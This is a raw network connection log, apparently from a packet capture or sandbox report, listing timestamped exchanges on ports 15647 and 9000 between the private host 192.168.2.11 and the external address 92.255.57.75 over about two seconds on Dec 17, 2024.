Dec 17, 2024 08:40:17.372673988 CET	9000	50049	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.374085903 CET	50049	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.375561953 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.375612974 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.377058983 CET	50049	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.400401115 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.400540113 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.402573109 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.402637959 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.402795076 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.407866001 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.407924891 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.423657894 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.423733950 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.443815947 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.443958044 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.448255062 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.448307991 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.459191084 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.459283113 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.475794077 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.475864887 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.475888014 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.496792078 CET	9000	50049	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.497781992 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.497981071 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.498182058 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.498231888 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.498286009 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.499787092 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.518733025 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.518789053 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.518871069 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.522555113 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.523921967 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.543000937 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.543554068 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.546381950 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.547907114 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.552772045 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.552839041 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.552911997 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.568008900 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.568074942 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.571578979 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.571656942 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.571696997 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.592714071 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.595676899 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.615871906 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.615936995 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.616053104 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.617263079 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.619522095 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.620497942 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.623855114 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.640264988 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.643912077 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.662687063 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.662765026 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.667617083 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.667680025 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.687500954 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.687596083 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.691390038 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.691473961 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.710645914 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.710747004 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.712605000 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.720011950 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.720067978 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.720082045 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.739674091 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.739752054 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.739860058 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.760263920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.761121035 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.782628059 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.782704115 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.795928001 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.795988083 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.796011925 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.811189890 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.811254978 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.811674118 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.830930948 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.831271887 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.857995033 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.859586954 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.859673977 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.859777927 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.859855890 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.859889030 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.880019903 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.880105972 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.902380943 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.902470112 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.928431034 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.928574085 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.935194969 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.935213089 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.935278893 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.958878040 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.958897114 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.958976030 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.978647947 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.978718042 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.979700089 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.979748011 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.980109930 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.992502928 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.992646933 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.992645025 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:17.999435902 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:17.999517918 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.024374962 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.024458885 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.027796030 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.027883053 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.027899027 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.027981043 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.052021980 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.052139997 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.052186966 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.073237896 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.073308945 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.073312998 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.094706059 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.094799995 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.099559069 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.099647999 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.110605955 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.110734940 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.120472908 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.120830059 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.145601988 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.145683050 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.145705938 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.148320913 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.148653030 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.150688887 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.150758982 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.173300982 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.173366070 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.192054033 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.192130089 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.214535952 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.214624882 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.230503082 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.230669975 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.240622044 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.240916014 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.247030020 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.247123957 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.247134924 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.247354031 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.249660015 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.249758005 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.265465975 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.265532970 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.266407013 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.266467094 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.266500950 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.270442009 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.271816969 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.292155981 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.305028915 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.307960987 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.329945087 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.334647894 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.335850000 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.336940050 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.337048054 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.347016096 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.347163916 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.347270012 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.349689960 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.349909067 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.361027002 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.361134052 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.369832039 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.370563984 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.384284019 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.384368896 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.386177063 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.406845093 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.407331944 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.412003040 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.414092064 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.414133072 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.414144993 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.422633886 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.422712088 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.446659088 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.449959993 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.450136900 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.455614090 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.456080914 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.457803965 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.457911015 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.467463970 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.467483997 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.467757940 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.480912924 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.481173038 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.504040956 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.504133940 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.527282953 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.527399063 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.534045935 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.534123898 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.534704924 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.534851074 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.534914970 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.555877924 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.561655045 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.562043905 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.566483974 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.566704035 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.575839996 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.575967073 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.585962057 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.586033106 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.586054087 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.600903034 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.601443052 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.604249001 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.604391098 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.620019913 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.620270967 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.642144918 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.642208099 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.642891884 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.653932095 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.655046940 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.655414104 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.655469894 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.655483007 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.675724030 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.676032066 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.682487011 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.683336020 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.695733070 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.695873976 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.700391054 CET	9000	50049	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.700404882 CET	9000	50049	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.700637102 CET	50049	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.701689005 CET	50049	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.706882954 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.706927061 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.706994057 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.724169970 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.732069969 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.732105970 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.732151985 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.758610964 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.759884119 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.769768953 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.771917105 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.771933079 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.771990061 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.771990061 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.775172949 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.777822018 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.803054094 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.804567099 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.815536022 CET	50050	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.821521044 CET	9000	50049	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.826895952 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.831001997 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.839734077 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.841129065 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.868103027 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.871984005 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.891571045 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.891618967 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.892318964 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.898160934 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.935307026 CET	9000	50050	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.935831070 CET	50050	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.936104059 CET	50050	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.939399004 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.939558029 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.939625025 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.960927010 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.964049101 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.973823071 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.973943949 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.974319935 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:18.976430893 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.995234013 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:18.995909929 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.009500980 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.009566069 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.009669065 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.022739887 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.022778034 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.022895098 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.055766106 CET	9000	50050	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.056747913 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.056765079 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.056844950 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.059957981 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.063858032 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.091105938 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.091162920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.091289997 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.120440960 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.121809959 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.131386042 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.134140968 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.143054962 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.183491945 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.184561014 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.184660912 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.218368053 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.246341944 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.249155045 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.250602007 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.273991108 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.298063040 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.298124075 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.303869009 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.303956032 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.304012060 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.304930925 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.304975986 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.321796894 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.322007895 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.329148054 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.329292059 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.329380035 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.329478025 CET	50034	15647	192.168.2.11	92.255.57.75
